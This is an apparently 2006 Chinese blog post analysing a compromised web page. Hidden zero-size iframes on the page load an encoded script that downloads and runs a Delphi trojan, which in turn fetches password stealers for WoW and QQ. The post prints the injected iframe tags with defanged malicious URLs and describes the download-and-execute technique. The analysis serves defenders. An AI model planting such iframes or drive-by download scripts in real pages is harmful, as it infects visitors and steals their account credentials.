本文详细分析了一种通过网页注入恶意脚本进行恶意软件传播的技术。该技术利用了JavaScript和VBScript来下载并执行恶意程序,包括特洛伊木马和下载器等。文中还提到了具体的恶意文件如1.exe及其所下载的wow.exe和qq.exe等。
endurer 原创
2006-10-25 第1版
网页首部被两次加入代码:
/---------
<iframe height=0 width=0 src="hxxp://ip-i*e.www***113.cnidc.cn/wm**/"></iframe>
----------/
wm**.htm (Kaspersky 报为 Trojan-Downloader.VBS.Psyme.cy) 的内容为 escape( ) 加密的代码,解密后的内容为一段 JavaScript 编写的 脚本程序,在这之前遇到的此类脚本代码都是用 VBScript编写的,不过都利用 Microsoft.XMLHTTP、Adodb.Stream 下载 1.exe,保存为 c:/boot.exe,通过Shell.Application 的 ShellExecute方法 运行。
1.exe 采用 Borland Delphi开发,文件长度为 15.5 KB (15,872 字节),Kaspersky 报为 Trojan-Downloader.Win32.Small.dwu,瑞星报为 Trojan.DL.Agent.wzr。
1.exe会从同一网站下载文件:
1)wow.exe(瑞星报为 Trojan.PSW.WoWar.lr)
2)qq.exe(使用的是JPG图片图标,Kaspersky 报为 Trojan-PSW.Win32.QQRob.iw,瑞星报为 Trojan.PSW.QQRobber.ajv)
从另一网站下载文件:
1)1234.exe(Kaspersky 报为 Trojan-PSW.Win32.WOW.le,瑞星报为 Trojan.PSW.Element.c)
2)4321.exe
网页末尾还有代码:
/---------
<iframe src="hxxp://bbs.geme***us.com/m1*3/index*.htm"width="0" height="0"></iframe>
---------/
似已失效。
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
